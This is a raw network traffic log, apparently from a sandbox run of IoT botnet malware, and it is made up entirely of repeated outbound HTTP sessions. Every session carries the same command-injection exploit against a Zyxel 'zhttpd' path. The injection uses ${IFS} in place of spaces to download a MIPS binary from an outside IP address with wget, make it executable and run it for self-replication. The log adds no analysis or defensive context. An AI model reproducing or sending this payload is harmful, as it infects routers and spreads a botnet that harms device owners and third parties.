                                              Jan 29, 2024 07:03:50.015444994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4487192.168.2.1437872220.58.252.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015477896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4488192.168.2.1460198154.161.129.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015527010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4489192.168.2.146014444.21.157.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015573025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4490192.168.2.143523679.125.3.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015616894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4491192.168.2.1457282182.196.246.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015650988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4492192.168.2.1453626198.119.227.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015686989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4493192.168.2.144772420.240.163.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015743017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4494192.168.2.1446992110.97.208.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015784979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4495192.168.2.144285691.32.145.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015810966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4496192.168.2.1444380211.185.180.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015839100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4497192.168.2.1441578168.245.175.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015887976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4498192.168.2.1435906197.214.190.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015919924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4499192.168.2.145131645.76.80.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015980959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4500192.168.2.1459414101.155.86.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016009092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4501192.168.2.145511258.156.204.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016051054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4502192.168.2.1458170177.100.67.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016088963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4503192.168.2.1441616144.197.187.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016148090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4504192.168.2.144376417.160.48.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016161919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4505192.168.2.1458802151.92.191.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016194105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4506192.168.2.144356892.63.203.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016249895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4507192.168.2.1448462101.124.243.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.016283989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4508192.168.2.1433944182.71.86.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025603056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4509192.168.2.146016241.36.22.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025640965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4510192.168.2.1454510203.195.97.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025669098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4511192.168.2.1455930113.71.88.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025749922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4512192.168.2.1460866124.244.45.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025790930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4513192.168.2.145801623.7.201.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025820017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4514192.168.2.143905673.74.20.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025862932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4515192.168.2.144743845.166.170.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025906086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4516192.168.2.1447756184.200.236.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025935888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4517192.168.2.1449928173.20.36.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.025955915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4518192.168.2.1442190100.143.120.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026000977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4519192.168.2.1458800174.88.103.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026026011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4520192.168.2.1443316112.199.96.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026057959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4521192.168.2.1456968209.189.99.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026098967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4522192.168.2.1440432108.208.36.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026134014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4523192.168.2.1448674209.198.86.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026175976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4524192.168.2.145557081.59.93.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026213884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4525192.168.2.143814665.29.101.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026243925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4526192.168.2.1434022199.88.222.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026308060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4527192.168.2.14438842.78.148.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026365042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4528192.168.2.1446960144.141.170.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026400089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4529192.168.2.143863476.228.25.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026418924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4530192.168.2.1439354103.54.10.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026465893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4531192.168.2.1454702203.253.15.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026501894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4532192.168.2.143547613.166.15.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026540041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4533192.168.2.1449392191.154.93.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026580095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4534192.168.2.1459480149.223.53.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026623964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4535192.168.2.145226219.119.75.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026675940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4536192.168.2.143509289.183.254.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026704073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4537192.168.2.1437412197.28.43.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026742935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4538192.168.2.145341895.170.201.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026784897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4539192.168.2.1460136189.125.58.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026838064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4540192.168.2.146036435.147.103.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026894093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4541192.168.2.1451012198.30.52.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026902914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4542192.168.2.145482275.76.233.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026946068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4543192.168.2.14555745.208.49.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.026968002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4544192.168.2.144220652.242.125.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027026892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4545192.168.2.1443240138.243.83.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027065039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4546192.168.2.143693884.241.221.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027101040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4547192.168.2.1451562117.147.104.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027136087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4548192.168.2.1443572190.127.208.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027192116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4549192.168.2.144791296.83.80.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.027225971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4550192.168.2.144791031.202.198.203443
                                              TimestampBytes transferredDirectionData
